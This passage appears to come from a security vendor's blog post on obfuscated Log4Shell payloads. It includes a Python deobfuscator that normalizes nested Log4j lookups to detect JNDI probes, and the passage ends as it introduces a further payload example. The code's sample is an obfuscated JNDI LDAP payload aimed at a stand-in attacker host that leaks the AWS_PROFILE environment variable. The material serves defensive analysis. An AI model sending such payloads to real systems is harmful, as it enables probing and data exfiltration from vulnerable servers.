Since the Log4j vulnerability discovery a few weeks ago, many Oxeye customers have experienced unauthorized attempts to probe their apps for Log4Shell instances. Some probes employed obfuscated payloads.
Threat actors tend to apply obfuscation techniques to their payloads for several reasons. Most security protection tools, such as web application firewalls (WAFs), rely on rules to match malicious patterns. By using obfuscated payloads, threat actors are able to circumvent the rule logic and bypass security measures. Moreover, obfuscated payloads increase analysis complexity and, depending upon the degree of obfuscation, can also prevent them from being reverse-engineered.
Decoding and analyzing obfuscated payloads is time-consuming and often results in inaccurate data. However, doing so is crucial for understanding attackers’ intentions.
To help our customers and the AppSec community at large, Oxeye developed an effective, free tool that deobfuscates Log4Shell payloads.
The Log4j library has a few unique lookup functions that permit users to look up environment variables, Java process runtime information, and so forth. These enable threat actors to probe for specific information that can uniquely identify a compromised machine they’ve targeted.
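The normalization step such a deobfuscator performs, written here as an added Python example (not Oxeye's tool, whose internals this post does not describe): nested lookups are reduced inside-out using Log4j's own `:-` default-value syntax and its `lower`/`upper` lookups, the normalized string is then matched for a JNDI lookup, and any `env` lookups it carries are listed to show what the probe is after. The sample payload and the hostname `attacker.example` are constructed for the example.

```python
import re

# Innermost ${...} lookup: its body contains no further "${".
_INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")

def _resolve(body: str) -> str:
    """Statically evaluate one lookup body using Log4j's substitution rules:
    'key:-default' falls back to default when key cannot be resolved."""
    key, default = (body.split(":-", 1) + [None])[:2]
    prefix, sep, arg = key.partition(":")
    if sep and prefix == "lower":
        return arg.lower()
    if sep and prefix == "upper":
        return arg.upper()
    # env:, sys:, date:, jndi: ... cannot be evaluated offline; a static
    # deobfuscator takes the attacker-supplied default when one is present.
    return default if default is not None else "${" + body + "}"

def deobfuscate(payload: str) -> str:
    """Reduce nested lookups inside-out until nothing changes."""
    while True:
        reduced = _INNERMOST.sub(lambda m: _resolve(m.group(1)), payload)
        if reduced == payload:
            return reduced
        payload = reduced

def is_log4shell_probe(payload: str) -> bool:
    """Match the normalized form, so obfuscation no longer hides the JNDI lookup."""
    return "${jndi:" in deobfuscate(payload).lower()

def probed_env_vars(payload: str) -> list:
    """Environment variables the payload tries to exfiltrate (intent analysis)."""
    return re.findall(r"\$\{env:([^}:]+)\}", deobfuscate(payload))

# Constructed sample, not a real capture: nested lookups spelling out "jndi",
# plus an env lookup the attacker wants echoed back in the callback URL.
SAMPLE = "${${lower:J}${::-n}${env:NOPE:-d}i:${lower:LDAP}://attacker.example/${env:AWS_PROFILE}}"

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))        # ${jndi:ldap://attacker.example/${env:AWS_PROFILE}}
    print(is_log4shell_probe(SAMPLE))  # True
    print(probed_env_vars(SAMPLE))     # ['AWS_PROFILE']
```

Lookups that need runtime context (`env`, `sys`, `date`, `jndi`) are left in place rather than guessed, so the reduction stops at the first unresolvable lookup and the analyst sees exactly which values the probe depends on.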
For example, the following payload demonstrates how miscreants are able to embed lookups within payloads to extract environment variables. Here the AWS_PROFILE environment variable, used on machines interacting with the Amazon Web Services API, is incorporated into the payload: